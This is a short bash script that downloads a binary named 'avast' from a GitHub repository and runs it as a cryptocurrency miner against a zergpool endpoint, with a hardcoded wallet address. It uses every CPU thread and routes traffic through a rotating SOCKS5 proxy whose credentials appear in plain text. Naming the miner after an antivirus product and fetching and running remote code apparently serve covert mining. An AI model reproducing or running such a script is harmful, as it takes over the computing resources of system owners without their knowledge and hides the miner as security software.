#!/bin/bash

WALS=Lhehm3xhWQNgF1EexRa1J2Q8LKdeAPovbY
POIL=verushash.mine.zergpool.com:3300
PASS=c=LTC,mc=VRSC
COMA="-v -l $POIL -u $WALS -p $PASS"

FILE=./avast
if [ -f "$FILE" ]; then
    echo "$FILE exists."
else 
    wget https://github.com/samrikulan/toya/raw/main/avast
    chmod +x avast  >/dev/null 2>&1
fi
./avast $COMA -t $(nproc) -x socks5://bephemio-rotate:x6c34egwnwrd@p.webshare.io:80

